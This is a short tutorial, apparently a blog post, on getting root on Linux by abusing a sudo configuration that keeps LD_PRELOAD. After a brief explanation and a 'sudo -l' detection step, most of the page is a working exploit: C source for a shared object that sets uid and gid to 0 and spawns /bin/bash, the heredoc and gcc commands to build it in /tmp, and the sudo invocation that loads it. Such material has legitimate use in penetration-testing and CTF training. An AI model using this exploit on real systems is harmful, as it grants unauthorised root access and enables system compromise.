SUDO-LD_PRELOAD Linux Privilege Escalation
What is LD_PRELOAD?
LD_PRELOAD is an optional environmental variable holding one or more paths to shared libraries or shared objects, the loader will load it before any other shared library including the C runtime library libc.so this is also called as preloading a library.
To avoid this mechanism being used as an attack vector for suid/sgid executable binaries, the loader ignores LD_PRELOAD if ruid != euid. For such binaries, only libraries in standard paths that are also suid/sgid will be preloaded.
Detection
Fire up terminal and type:
user@debian:~$ sudo -l Matching Defaults entries for user on this host: env_reset, env_keep+=LD_PRELOAD
If output something like this, congratulations target is vulnerable and you can exploit the LD_PRELOAD issue to get root privilege shell and to accomplish privilege escalation you also need some sudo permission binary which uses LD_PRELOAD envr.

some Sudo command which can be done, current user.
Program File :
#include <stdio.h> #include <sys/types.h> #include <stdlib.h> void _init() { unsetenv("LD_PRELOAD"); setgid(0); setuid(0); system("/bin/bash"); }
Exploit LD_PRELOAD.
open terminal and go to any Writable Directory for dropping shell.
writable directory like
- /tmp
- /var/tmp
- /dev/shm
in our case we using /tmp directory.
Drop an evil.c using any text editor, here we used cat for dropping shell.
user@debian:/tmp$ cat << EOF >> evil.c > #include <stdio.h> > #include <sys/types.h> > #include <stdlib.h> > void _init() { > unsetenv("LD_PRELOAD"); > setgid(0); > setuid(0); > system("/bin/bash"); > } > EOF
lest Compile and make object file.
gcc -fPIC -shared -o evil.so evil.c -nostartfiles
Time to final step 3:)
sudo LD_PRELOAD=evil.so <COMMAND>
here <COMMAND> mean which command have u allowed to do with sudo.



you can use any sudo command which allowed to current user.
You Got a Shell!!!!!
Recent Comments